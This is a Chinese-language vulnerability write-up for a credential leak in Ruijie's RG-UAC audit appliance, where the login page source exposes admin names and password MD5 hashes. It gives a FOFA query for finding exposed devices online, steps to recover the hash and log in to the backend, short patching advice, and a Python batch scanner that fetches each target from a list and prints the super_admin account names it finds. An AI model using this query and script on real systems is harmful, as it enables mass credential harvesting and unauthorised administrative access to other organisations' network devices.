0x01漏洞描述
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露漏洞:登录页面的源码中包含管理员账号及其密码的MD5值,攻击者可据此间接获取账号密码并登录后台
0x02 影响
锐捷RG-UAC统一上网行为管理审计系统
0x03漏洞复现
使用FOFA语句
title="RG-UAC登录页面" && body="admin"
直接F12 搜索关键字 admin
对 password 字段的 MD5 值进行查询还原(MD5 是哈希算法而非加密,严格来说并非“解密”)
使用用户名和刚刚破解的密码,即可登录后台系统
0x04 安全建议
1、及时关注官方补丁
2、建议避免将该设备暴露于互联网;若管理页面曾可从外部访问,应视管理员密码已泄露并及时重置
批量验证POC
# author: Zeo
# python: 3.7
# datetime:2021/3/8 4:48 下午
# software: PyCharm
"""
文件说明:锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露
"""
import requests
import sys
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Banner printed once at start-up: the name of the issue being checked and
# the expected invocation (a text file of targets).
title = (
    "\n"
    "--------------------------------------------\n"
    "锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露\n"
    "使用格式: python3 url.txt\n"
    "--------------------------------------------\n"
)
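def Scan(file_name):
    """Check every target listed in *file_name*, one URL or host per line.

    Each line is stripped of surrounding whitespace (including the carriage
    return left by CRLF files), blank lines are skipped, and ``http://`` is
    prepended when the line has no ``http://`` or ``https://`` scheme. Every
    target is handed to ``exp``; an error on one target is reported and does
    not stop the run.

    Args:
        file_name: Path of the UTF-8 text file holding the targets.
    """
    # utf-8-sig also accepts files without a BOM; with one, the BOM would
    # otherwise end up glued to the first target.
    with open(file_name, "r", encoding='utf-8-sig') as urls:
        for line in urls:
            url = line.strip()
            if not url:
                # A blank line would otherwise turn into a request to "http://".
                continue
            if not url.startswith(("http://", "https://")):
                url = "http://" + url
            try:
                exp(url)
            except Exception as e:
                # Keep going through the list, but do not hide the failure:
                # a silently skipped target looks the same as a clean one.
                print("目标 {}检测出错: {}".format(url, e))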
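def exp(target_url):
    """Fetch *target_url* and report whether the page exposes admin account data.

    The target is flagged when it answers 200 and the body contains both
    ``super_admin`` and ``password``; the names of the ``super_admin``
    accounts found in the body are then printed. A failed request is
    reported as inconclusive rather than as "not vulnerable".

    The output names exposed accounts next to the affected URL, so it is
    sensitive in its own right.

    Args:
        target_url: Full URL (with scheme) of the page to check.

    Returns:
        None. The result is written to stdout.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
    }
    # NOTE(review): certificate verification is switched off (verify=False)
    # and the matching urllib3 warning is silenced for the whole process,
    # presumably because these appliances use self-signed certificates.
    # The response is therefore not authenticated.
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    try:
        response = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
    except requests.exceptions.RequestException as e:
        # A timeout or connection error says nothing about the device, so it
        # must not be counted as a clean result.
        print("目标 {}请求失败,无法判断是否存在漏洞: {}".format(target_url, e))
        return

    body = response.text
    if response.status_code == 200 and "super_admin" in body and "password" in body:
        print("目标 {}存在漏洞 密码md5自行查询破解".format(target_url))
        # The pattern depends on the exact key order of the account records;
        # a flagged page with no names printed means the layout differs.
        pattern = r'"auth_method":"1","role":"super_admin","name":"(.*?)","lastpwdtime":'
        for username in re.findall(pattern, body):
            print(username)
    else:
        print("目标 {}不存在漏洞".format(target_url))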
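if __name__ == '__main__':
    print(title + '\n')
    # Indexing sys.argv[1] directly raises IndexError when no list file is
    # given, so the argument count is checked before reading it.
    file_name = sys.argv[1] if len(sys.argv) > 1 else ""
    if not file_name:
        # Nothing to check; the banner above already shows the usage line.
        sys.exit(1)
    Scan(file_name)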